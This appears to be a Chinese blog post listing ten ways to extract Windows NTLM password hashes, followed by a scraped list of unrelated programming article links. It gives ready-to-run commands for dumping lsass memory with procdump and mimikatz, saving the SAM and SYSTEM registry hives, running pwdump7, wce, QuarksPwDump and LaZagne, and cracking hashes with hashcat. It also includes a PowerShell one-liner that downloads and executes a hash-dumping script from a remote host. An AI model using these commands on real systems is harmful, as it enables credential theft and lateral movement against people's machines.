获取windows hash的几种方式
一、windows hash介绍
NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash
该hash的生成方法:
将明文口令转换成十六进制的格式;
转换成Unicode格式,即在每个字节之后添加0x00;
对Unicode字符串作MD4加密,生成32位的十六进制数字串;
如测试测试密码为haha123
转成十六进制为:68616861313233
unicode转换:6800610068006100310032003300
md4加密:87ed0101e532322a4566d675f1627d30
测试环境:win7
二、windows hash值的获取
1、利用 mimikatz 获取明文密码
mimikatz下载地址:https://github.com/gentilkiwi/mimikatz/releases
根据下载文件夹中的readme
privilege::debug
sekurlsa::logonpasswords
获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段
2、利用 procdump & mimikatz 获取密码(推荐使用)
procdump是 Microsoft Sysinternals tools 中的工具,它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中。
procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
以管理员身份运行cmd,利用procdump导出lsass进程文件
procdump.exe -accepteula -ma lsass.exe
导出结束后利用mimikatz读出内容
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit)
3、利用 pwdump7 获取密码
下载地址:http://passwords.openwall.net/b/pwdump/pwdump7.zip
管理员权限运行cmd
获取加密后的hash,可登录网站https://www.objectif-securite.ch/ophcrack,进行解密
也可以用hashcat进行破解,具体使用可参考;https://xz.aliyun.com/t/4008
hashcat -a 3 -m 1000 --force 209C6174DA490CAEB422F3FA5A7AE634 ?l?l?l?l?l
4、利用SAMinside获取hash
SAMInside:它能从SAM注册文件中提取用户名以及密码
“导入本地用户通过任务计划”
5、wce.exe 获取hash
下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/
保存输出到文件内:wce.exe -o output.txt
获取明文密码:wce.exe -w
6、SharpDump.exe
7、Mimikatz 调用 lsadump(推荐使用)
该方法在win7、win10 下均可适用
使用 Reg 需要NT/SYSTEM权限 :
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\security security.hiv
Mimikatz 调用 lsadump
lsadump::sam /system:system.hiv /sam:sam.hiv
8、QuarksPwDump工具
下载地址:https://github.com/ssssanr/QuarksPwDump-off-line
Quarkspwdump.exe -dhl
9、LaZagne
下载地址:https://github.com/AlessandroZ/LaZagne/releases/
LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序,存在linux版、windows版、mac版,LaZagne.exe可捕获的密码会全一些,可抓取浏览器、无线等相关密码,获取windows hash值。
LaZagne.exe windows
10、powershell
下载地址:https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1
使用方法:(xx.xx.xx.xx为存放shell的ip地址)
powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Get-PassHashes.ps1');Get-PassHashes
文档参考:
https://3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/
https://www.jianshu.com/p/7ccf6e15fbe0
获取windows hash的几种方式相关推荐
- Android中获取屏幕信息的几种方式
Android中获取屏幕信息的几种方式 方案一 方案二 方案三 Note:以下方案中的this均指Activity. 方案一 WindowManager wm = (WindowManager) th ...
- springboot实战 获取spring上下文的4种方式
实际开发中我们经常需要通过spring上下文获取一些配置信息,本文阐述springboot应用获取spring上下文的几种方式. 方式一:实现ApplicationContextAware接口 imp ...
- python执行系统命令后获取返回值的几种方式集合
第一种情况 os.system('ps aux') 执行系统命令,没有返回值 第二种情况 result = os.popen('ps aux') res = result.read() for lin ...
- 获取Class对象的三种方式
获取Class对象的三种方式 Object --> getClass() 通过对象.getclass 任何数据类型(包括基本数据类型)都有一个"静态"的class属性 通过类 ...
- html中获取modelandview中的json数据_从Bitmap中获取YUV数据的两种方式
从Bitmap中我们能获取到的是RGB颜色分量,当需要获取YUV数据的时候,则需要先提取R,G,B分量的值,然后将RGB转化为YUV(根据具体的YUV的排列格式做相应的Y,U,V分量的排列) 所以这篇 ...
- php解析url并得到url中的参数及获取url参数的四种方式
本文给大家介绍php解析url并得到url中的参数及获取url参数的四种方式,涉及到将字符串参数变为数组,将参数变为字符串的相关知识,本文代码简单易懂,感兴趣的朋友一起看看吧 下面一段代码是php解析 ...
- 获取class文件对象三种方式
Class类 阅读API的Class类得知,Class 没有公共构造方法.Class 对象是在加载类时由 Java 虚拟机以及通过调用类加载器中的 defineClass 方法自动构造的 获取Clas ...
- 反射应用和获取Class对象的三种方式
一.写一个"框架",可以创建任何对象运行任何方法 1.配置文件 2.使用类加载器ClassLoader,Properties集合是可以和IO流结合使用完成读取和写入数据的集合,方法 ...
- springboot 获取控制器参数的几种方式
这里介绍springboot 获取控制器参数有四种方式 1.无注解下获取参数 2.使用@RequestParam获取参数 3.传递数组 4.通过URL传递参数 无注解下获取参数 无注解下获取参数,需要 ...
最新文章
- java找图最短路径_查找有向图最短路径
- 差异基因分析:fold change(差异倍数), P-value(差异的显著性)
- PHP操作文件常用函数
- storm安装笔记以及提交拓扑任务
- 电脑按f8无法进入安全模式_自已有电脑的人,都会遇到系统死机问题,教大家实用一招自已解决...
- php 控制器 模板,php学习笔记(一)php模板与控制器
- Ceres和g2o的配置和使用
- python基础3——运算符
- .Net Core 2.0+ InfluxDB+Grafana+App Metrics 实现跨平台的实时性能监控
- 强化学习进阶【逆强化学习】
- 【转】nginx禁止访问某个文件和目录(文件夹)
- 基于JavaSwing开发中国象棋对战游戏+实验报告 课程设计 大作业
- 商业创业计划书PPT模板
- 基于WiEngine游戏引擎的Sample
- vscode可以配置哪些编程语言_vscode支持哪些编程语言
- 笔记本重装win7旗舰版原版操作系统
- P4官方实验4. Explicit congestion notification
- Java物流运输管理系统源码 快递物流管理系统源码
- Vue mounted和created和 activated
- 数组和ArrayList的区别
热门文章
- json解析几种格式
- 谣言检测相关论文阅读笔记:DDGCN: Dual Dynamic Graph Convolutional Networks for Rumor Detection on Social Media
- 天青色等烟雨 我在古风配乐专栏等你~
- 游戏里的角色都什么格式图片_游戏里性感的女角色那么多 为什么我们偏偏对春丽念念不忘?...
- 国民MCU 微型打印机解决方案
- Win11任务栏遮挡窗口底部界面怎么办?
- 好程序员web培训简述web前端开发工具有哪些
- python给图像添加噪声(高斯噪声、椒盐噪声)
- 基于聚类的推荐算法笔记——以豆瓣电影为例(三)(附源代码)
- miui 10 android 9,基于安卓10的MIUI 10小米9开始内测!小米8没必要催